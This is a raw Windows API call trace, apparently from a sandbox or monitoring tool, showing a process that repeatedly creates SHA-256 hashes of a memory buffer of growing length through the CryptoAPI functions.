	[0102.079] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.079] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245f48
	[0102.079] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245f48, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245f48, pdwDataLen=0x12941c) returned 1
	[0102.079] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.079] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.079] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.079] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.079] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0102.079] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.079] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245f70
	[0102.079] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245f70, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245f70, pdwDataLen=0x12941c) returned 1
	[0102.079] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.079] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.079] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.080] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.080] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0102.080] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245f98
	[0102.080] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245f98, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245f98, pdwDataLen=0x12941c) returned 1
	[0102.080] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.080] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.080] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.080] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.080] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0102.080] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245fc0
	[0102.080] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245fc0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245fc0, pdwDataLen=0x12941c) returned 1
	[0102.080] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.080] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.080] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.081] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.081] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0102.081] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245fe8
	[0102.081] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245fe8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245fe8, pdwDataLen=0x12941c) returned 1
	[0102.081] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.081] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.081] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.081] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.081] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0102.081] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246010
	[0102.081] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246010, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246010, pdwDataLen=0x12941c) returned 1
	[0102.081] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.081] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.081] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.082] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.082] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0102.082] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246038
	[0102.082] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246038, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246038, pdwDataLen=0x12941c) returned 1
	[0102.082] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.082] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.082] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.082] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.082] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0102.082] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246060
	[0102.082] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246060, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246060, pdwDataLen=0x12941c) returned 1
	[0102.082] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.082] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.082] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.083] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.083] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0102.083] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246088
	[0102.083] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246088, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246088, pdwDataLen=0x12941c) returned 1
	[0102.083] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.083] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.083] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.083] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.083] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0102.083] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2460b0
	[0102.083] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2460b0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2460b0, pdwDataLen=0x12941c) returned 1
	[0102.083] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.083] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.083] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.084] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.084] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0102.084] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2460d8
	[0102.084] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2460d8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2460d8, pdwDataLen=0x12941c) returned 1
	[0102.084] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.084] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.084] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.084] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.084] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0102.084] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246100
	[0102.084] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246100, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246100, pdwDataLen=0x12941c) returned 1
	[0102.084] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.084] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.084] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.085] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.085] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0102.085] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246128
	[0102.085] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246128, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246128, pdwDataLen=0x12941c) returned 1
	[0102.085] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.085] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.085] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.085] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.085] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0102.085] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246150
	[0102.085] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246150, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246150, pdwDataLen=0x12941c) returned 1
	[0102.085] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.085] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.085] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.086] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.086] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0102.086] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2461a8
	[0102.086] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2461a8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2461a8, pdwDataLen=0x12941c) returned 1
	[0102.086] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.086] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.086] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.086] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.086] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0102.086] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2461d0
	[0102.086] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2461d0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2461d0, pdwDataLen=0x12941c) returned 1
	[0102.086] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.086] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.086] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.087] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.087] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0102.087] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2461f8
	[0102.087] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2461f8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2461f8, pdwDataLen=0x12941c) returned 1
	[0102.087] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.087] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.087] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.087] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.087] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0102.087] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246220
	[0102.087] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246220, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246220, pdwDataLen=0x12941c) returned 1
	[0102.087] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.087] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.088] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.088] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.088] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0102.088] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246248
	[0102.088] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246248, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246248, pdwDataLen=0x12941c) returned 1
	[0102.088] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.088] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.088] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.088] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.088] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0102.088] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246270
	[0102.088] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246270, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246270, pdwDataLen=0x12941c) returned 1
	[0102.088] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.088] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.089] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.089] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.089] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0102.089] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246298
	[0102.089] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246298, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246298, pdwDataLen=0x12941c) returned 1
	[0102.089] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.089] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.089] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.089] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.089] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0102.089] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2462c0
	[0102.089] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2462c0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2462c0, pdwDataLen=0x12941c) returned 1
	[0102.089] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.089] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.090] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.090] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.090] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0102.090] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2462e8
	[0102.090] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2462e8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2462e8, pdwDataLen=0x12941c) returned 1
	[0102.090] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.090] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.090] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.090] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.090] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0102.090] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246310
	[0102.090] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246310, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246310, pdwDataLen=0x12941c) returned 1
	[0102.090] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.090] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.090] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.091] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.091] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0102.091] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246338
	[0102.091] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246338, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246338, pdwDataLen=0x12941c) returned 1
	[0102.091] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.091] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.091] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.091] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.091] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0102.091] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246360
	[0102.091] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246360, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246360, pdwDataLen=0x12941c) returned 1
	[0102.091] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.091] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.091] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.092] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.092] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0102.092] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
